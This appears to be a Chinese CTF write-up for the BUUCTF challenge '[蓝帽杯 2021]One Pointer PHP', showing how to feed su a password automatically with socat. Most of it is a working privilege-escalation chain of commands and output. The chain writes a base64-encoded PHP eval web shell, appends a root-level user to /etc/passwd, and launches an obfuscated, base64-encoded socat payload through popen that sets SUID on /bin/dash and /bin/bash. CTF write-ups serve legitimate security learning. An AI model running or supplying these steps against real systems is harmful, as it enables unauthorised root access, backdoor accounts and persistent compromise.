linux su自动输入密码 使用socat

  buu ctf web 第6页: [蓝帽杯 2021]One Pointer PHP    

一般情况下,使用su(从低级的普通用户切换至root)切换用户需要手动输入密码

借助socat(360KB大小)工具,可以自动完成.

https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat

这里使用的是socat静态编译版

SHA1:F1A4ABD70F8E56711863F9E7ED0A4A865267EC77

su - tee

#需要手动输入密码

方法一:需要两次命令

/tmp/socat -v exec:"su - tee",pty unix-l:/tmp/ba2ba   
/tmp/socat -v unix:/tmp/ba2ba exec:'echo -e "123456nidnchmod u+s /bin/bashnexit"'

方法二:一步到位

​/tmp/socat -v -t4 -d exec:"su - tee",pty exec:'bash -c "echo${IFS}-e${IFS}-n${IFS}"123456\rid\rchmod${IFS}u+s${IFS}/bin/dash\rexit\r";"  ',pty

使用的socat版本为:

xxx$ ./socat -V
socat by Gerhard Rieger - see www.dest-unreach.org
socat version 1.7.3.0 on Jun 16 2015 21:24:31
   running on Linux version #202112141049 SMP Tue Dec 14 11:54:51 UTC 2021, release 4.19.221-0419221-generic, machine x86_64

在  [蓝帽杯 2021]One Pointer PHP    环境下:

在使用蚁剑可以管理上的情况:使用蚁剑的[虚拟终端]功能

提示:可以使用蚁剑插件 [绕过disable_functions] 里最后一项: [PHP7_UserFilter],得到虚拟终端

第一步: 启动带suid的php进程(在蚁剑的[虚拟终端]直接输入,无需编码)

php -n -S 127.0.0.1:65432 -t /tmp -d enable_dl=On -d extension_dir='/tmp/' 2>&1 |tee -a /tmp/p3log  

/tmp目录写shell

echo PD89ZXZhbCgkX1JFUVVFU1RbM10pOyAg|base64 -d|tee /tmp/1.php

测试shell

curl -v -o-  "http://127.0.0.1:65432/1.php?3=print_r%289981%29%3B"

第二步: 增加用户tee,用户id是0,也就是和root用户一样的权限

root@out:/tmp# cat /var/www/html/1.php 
8
root@out:/tmp# cat /tmp/1.php 
8
root@out:/tmp# 

# curl -v -o- "http://127.0.0.1:65432/1.php?3=file_put_contents('/etc/passwd','tee:$1$123456$wOSEtcyiP2N/IfIl15W6Z0:0:0:toor:/tmp:/bin/bash'.PHP_EOL,FILE_APPEND);"

在蚁剑的[虚拟终端]需要编码:

curl -v -o- "http://127.0.0.1:65432/1.php?3=file_put_contents%28%27%2Fetc%2Fpasswd%27%2C%27tee%3A%241%24123456%24wOSEtcyiP2N%2FIfIl15W6Z0%3A0%3A0%3Atoor%3A%2Ftmp%3A%2Fbin%2Fbash%27.PHP_EOL%2CFILE_APPEND%29%3B"

运行完毕后,/etc/passwd里已经有tee这个超级用户了

验证:

curl -v -o- "http://127.0.0.1:65432/1.php?3=readfile%28%27%2fetc%2fpasswd%27%29%3b"

第三步:通过蚁剑文件管理器上传socat至/tmp目录,并给0744的权限,使其可以在www-data的权限下执行.  

第四步:

在蚁剑的[虚拟终端]需要编码:

curl -v -o- "http://127.0.0.1:65432/1.php?3=pclose%28popen%28%27%28%28%2Ftmp%2Fsocat%20-v%20-t4%20-d%20-d%20-d%20-d%20exec%3A%22su%20-%20tee%22%2Cpty%20exec%3A%22bash%20-c%20echo%5C%24%7BIFS%7DZWNobyAgLWUgIC1uICIxMjM0NTZccmlkXHJjaG1vZCB1K3MgL2Jpbi9kYXNoXHJub2h1cCBzbGVlcCAzOTgmXHJleGl0XHIi%7Cbase64%5C%24%7BIFS%7D-d%7Cbash%22%2Cpty%29%26%29%26%27%2C%27r%27%29%29%3B"

解码后是:

curl -v -o- "http://127.0.0.1:65432/1.php?3=pclose(popen('((/tmp/socat -v -t4 -d -d -d -d exec:"su - tee",pty exec:"bash -c echo${IFS}ZWNobyAgLWUgIC1uICIxMjM0NTZccmlkXHJjaG1vZCB1K3MgL2Jpbi9kYXNoXHJub2h1cCBzbGVlcCAzOTgmXHJleGl0XHIi|base64${IFS}-d|bash",pty)&)&','r'));"

怕csdn转义:我用代码段再复制一份,如下:

curl -v -o- "http://127.0.0.1:80/1.php?3=pclose(popen('((/tmp/socat -v -t4 -d -d -d -d exec:"su - tee",pty exec:"bash -c echo${IFS}ZWNobyAgLWUgIC1uICIxMjM0NTZccmlkXHJjaG1vZCB1K3MgL2Jpbi9kYXNoXHJub2h1cCBzbGVlcCAzOTgmXHJleGl0XHIi|base64${IFS}-d|bash",pty)&)&','r'));"

ZWNobyAgLWUgIC1uICIxMjM0NTZccmlkXHJjaG1vZCB1K3MgL2Jpbi9kYXNoXHJub2h1cCBzbGVlcCAzOTgmXHJleGl0XHIi 解码后是:

echo  -e  -n "123456ridrchmod u+s /bin/dashrnohup sleep 398&rexitr"

也就是自动输入用户tee的密码123456,并且给/bin/dash加suid权限,再后台运行一个sleep 398作为观察成功与否的标志.最后再退出su命令,注意su命令识别r而不是n 作为回车.

(www-data:/var/www/html) $ ls -al /bin/?ash

-rwxr-xr-x 1 root root 1168776 Apr 18  2019 /bin/bash

-rwsr-xr-x 1 root root  121464 Jan 17  2019 /bin/dash

(www-data:/var/www/html) $ 

(www-data:/var/www/html) $ /bin/dash -p -c id

uid=33(www-data) gid=33(www-data) euid=0(root) groups=33(www-data)

(www-data:/var/www/html) $ /bin/dash -p -c 'chmod u+s /bin/bash'

(www-data:/var/www/html) $

(www-data:/var/www/html) $ /bin/dash -p -c 'chmod 4755 /bin/bash'

(www-data:/var/www/html) $ 

(www-data:/var/www/html) $ ls -al /bin/?ash

-rwsr-xr-x 1 root root 1168776 Apr 18  2019 /bin/bash

-rwsr-xr-x 1 root root  121464 Jan 17  2019 /bin/dash

(www-data:/var/www/html) $